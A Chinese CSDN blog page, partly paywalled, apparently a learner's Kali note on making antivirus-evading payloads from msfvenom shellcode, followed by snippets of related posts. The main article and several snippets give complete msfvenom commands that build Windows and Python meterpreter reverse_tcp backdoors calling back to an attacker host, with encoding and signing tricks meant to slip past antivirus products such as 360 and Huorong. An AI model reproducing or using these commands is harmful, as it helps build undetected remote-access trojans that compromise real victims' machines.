Kali的学习笔记篇（八）使用msf生成的shellcode制作免杀payload

最新推荐文章于 2024-08-22 22:18:32 发布

红衣学姐

最新推荐文章于 2024-08-22 22:18:32 发布

阅读量6.5k

点赞数 7

分类专栏： kali 卡莉咖喱

本文链接：https://blog.csdn.net/qq_34886247/article/details/81613335

版权

kali 同时被 2 个专栏收录

11 篇文章 10 订阅 ¥19.90 ¥99.00

订阅专栏

超级会员免费看

卡莉咖喱

8 篇文章 0 订阅 ¥29.90 ¥99.00

订阅专栏

超级会员免费看

本文介绍了在Kali Linux环境下，通过msfvenom生成shellcode并用Visual Studio 2017制作免杀payload的过程。测试结果显示，直接注入的payload被杀软检测概率较高，而通过C代码编译的payload虽然部分杀软能过，但仍有较高的拦截率，尤其是火绒。作者寻求改进免杀效果的方法。

摘要由CSDN通过智能技术生成

环境：

kali-linux-2018.2-amd.iso

Visual Studio 2017

msfvenom

更新时间：2018年8月13日07:06:43

直接注入的生成方式（一）：

//生成c格式的后门,-p指定模块,-e 指定编码,-i指定编码次数,-f 输出格式,-b 去除指定代码
root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5 -b '\x00' LHOST=192.168.1.113 LPORT=55555 -f exe > test.exe

输出c格式的方式（二）：

root@kali:~# msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b '\x00' LHOST=192.16

了解本专栏

订阅专栏解锁全文

超级会员免费看

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

红衣学姐

关注关注

7
点赞
踩
20

收藏

觉得还不错? 一键收藏
2
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

专栏目录

订阅专栏

使用shellcode打造MSF免杀payload

Coisini的博客

06-21

1935

0x00 前言经常有同学提及MSF payload的免杀问题，其实除了Veil之处，还有另一种比较轻巧的方案可以打造免杀的payload，那就是shellcode。 0x01 从哪里开始 shellcode是什么，可以去drops搜索学习，但这并不是本文的重点。因为MSF已经为我们提供了shellcode的生成功能，接下来我们就拿最常用的payload：reverse_tcp来做测试吧！（其它...

msf生成linux shellcode,MSF-Shellcode生成和使用

weixin_33344952的博客

05-13

580

1使用環境Kali 2.0msfvenom2Msfvenom參數說明msfvenom �Ch 查看幫助說明:Options:-p, --payload 指定需要使用的payload(攻擊荷載)。如果需要使用自定義的payload，請使用'-'或者stdin指定-l, --list [module_type] 列出指定模塊的所有可用資源. 模塊類型包括: ...

2 条评论您还未登录，请先登录后发表或查看评论

使用MSF生成的shellcode打造免杀payload

热门推荐

MickeyMouse1928的博客

05-04

1万+

环境： 1.Kali攻击机IP：192.168.114.140 2.使用win7生成exe 步骤：使用msfvenom生成shellcode ： msfvenom -pwindows/meterpreter/reverse_http lhost=192.168.114.140 lport=5555 -f c win7中使用Visual studio创建Win32控制台

Kali--MSF-永恒之蓝详解（复现、演示、远程、后门、加壳、修复）

dzqxwzoe的博客

08-22

1068

永恒之蓝（EternalBlue）爆发于2017年4月14日晚，是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限，以此来控制被入侵的计算机。甚至于2017年5月12日，不法分子通过改造“永恒之蓝”制作了wannacry程序，使全世界大范围内遭受了该程序，甚至波及到学校、大型企业、政府等机构，只能通过支付高额的赎金才能恢复出文件。但不过在该程序出来不久就被微软通过打补丁修复了。为了维持操作系统的安全，我们能做到的是及时更新，安装补丁，关闭不必要的服务和端口。

使用MSF生成shellcode

weixin_34092455的博客

04-02

1055

使用MSF生成shellcode payload和shellcode的区别 Payload是是包含在你用于一次漏洞利用（exploit）中的ShellCode中的主要功能代码。因为Payload是包含在ShellCode中的，ShellCode是真正的被输入到存在漏洞的程序中的，并且ShellCode负责把程序的流程最终转移到你的Payload代码中。所以对于一个漏洞来说，ShellCode就...

msf生成linux shellcode,使用MSF打造各种ShellCode

weixin_39866419的博客

05-13

959

生成各种后门Windows:msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 3 -f exe -opayload.exeLinux:msfvenom -a x86 --pla...

使用MSF打造各种ShellCode

weixin_30824599的博客

03-20

2216

MSF 生成各种后门 Windows: 生成Windows后门. msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST= 攻击机IP LPORT=攻击机端口 -e x86/shikata_ga_nai -b '\x00\x0a\xff' -i 3 -f exe -o payload.exe Linux...

4.1 MSF 制作shellcode，且运行

qq_55202378的博客

08-25

3850

msf shellcode

Veil-Ordnance:Veil-Ordnance是一种旨在快速生成MSF Stager Shellcode的工具

05-09

面纱军械 Veil-Ordnance旨在快速生成可用于漏洞利用或有效载荷的shellcode。在@ christruncer，@ themightyshiv和@ harmj0y之间进行了多次讨论之后，我们得到了灵感。在这些讨论中，我们确定了需要一种生成shellcode的工具，而该工具不会改变我们的输出。我们决定不依赖第三方来执行此操作，而是决定自己编写。此工具中的所有有效负载均从Metasploit框架移植。没有声称是任何有效载荷的原始作者。在Metasploit项目上工作的出色人士都因在此工具中编写不同的有效负载而受到所有人的称赞。他们的有效负载只是从Ruby移植到Python。用法： ./Veil-Ordnance.py -p rev_tcp --ip 192.168.63.149-端口8675 例子： ./Veil-Ordnance.py -p rev_ht

msf编码免杀

m0_61506558的博客

09-03

2586

自编码处理自捆绑+编码多重编码接口下载式签名伪装式

使用msfpayload生成shellcode

11-10

5477

在看0day安全：软件漏洞分析技术的时候需要用到shellcode，照着上面的写个

免杀的N种姿势-msf自免杀

m0_51268003的博客

04-02

933

原文地址：远控免杀专题文章(3)-msf自免杀(VT免杀率35/69) 本人只为技术交流和自我记录笔记对于原文作者和团队充满膜拜如有侵权请联系本人删除文章前言：本地的安全工具下载安装会影响玩LOL 所以实验嘛用在线查毒就好啦（virustotal.com）未处理的payload(VT查杀率53/69) msf自编码处理(VT查杀率51/69) 使用msfvenom --list encoders可查看所有编码器评级最高的两个encoder为cmd/powe...

MSF实战免杀过静态:ShellCode加花指令

xf555er的博客

03-30

1211

第一部分（api_call）是一个通用API调用函数，用于动态查找和调用API。第二部分（reverse_tcp）创建一个反向TCP连接，将本地机器连接到攻击者的监听器。第三部分（recv）负责接收并执行第二阶段Payload。这三部分共同实现了一段完整的Shellcode，用于反向连接攻击者机器并执行远程指令。

木马与免杀(2), msfvenom 工具, shellcode代码, shellcode加载器

探测???

12-07

378

Shellcode是一段用于利用软件漏洞而执行的代码，通常以16进制机器码形式编写，因为它经常让攻击者获得shell的名称[1]。Shellcode的主要目的是让攻击者的恶意代码在受害者的计算机上执行，从而实现对系统的控制或数据的修改、窃取或上传等目的。Shellcode的内容通常是一段可以在受害者的计算机上执行的机器代码，用于实现攻击者的目标。这段代码可以是出于恶作剧目的弹出一个消息框，也可以出于攻击目的的删改重要文件、窃取数据、上传木马病毒并运行，甚至是出于破坏目的格式化硬盘等。

kaliwin10免杀

h1825819493的博客

06-09

497

在查看配置的时候Required中写yes的都是需要进行配置的，有的是默认配置好的，但是也可以进行更改。对生成的马进行签名。新建一个文件夹，把签名用的python程序放在文件夹，在把生成的马放进去。生成win10免杀马，用360和火绒是识别不出来的（不能再win11下运行）windows隐藏绑定外壳。

[免杀学习]MSF网络查杀与规避

qq_42585535的博客

08-06

606

终于摸到一点免杀的门了，前面学那么多win api编程都是在打基础前排提醒:这篇文章不会讲什么理论的东西，因为本人也刚接触免杀，基本没有什么免杀知识，所以只是把当前学到的东西复现一遍。

shellter-kali免杀工具

dongxieaitonglao的博客

03-17

316

/usr/share/windows-resources/shellter 这个文件夹 shellter目录下的Shellter_Backups文件夹是你注入文件后备份的文件夹，会自动把原文件备份一个到这个文件夹下

Kali木马免杀，权限提升（kali本地木马免杀）

AI学习困难户的博客

02-15

5134

由于现在版本的木马查杀工具更新之快，木马在计算机上基本是裸奔的，再好的免杀技术也逃不过工具的查杀，下面是我研究很久的本地木马免杀，基本都是网上的百度总结，把可以是实现免杀的木马生成进行了总结。免杀成功1（由于使用的是python载荷，由于权限问题，部分命令不可用）使用pyinstall，先生成py再转换成exe文件 1.生成py文件 msfvenom -p python/meterpreter/reverse_tcp lhost=192.168.137.44 lport=4444 -f...

kali中如何安装msfpayload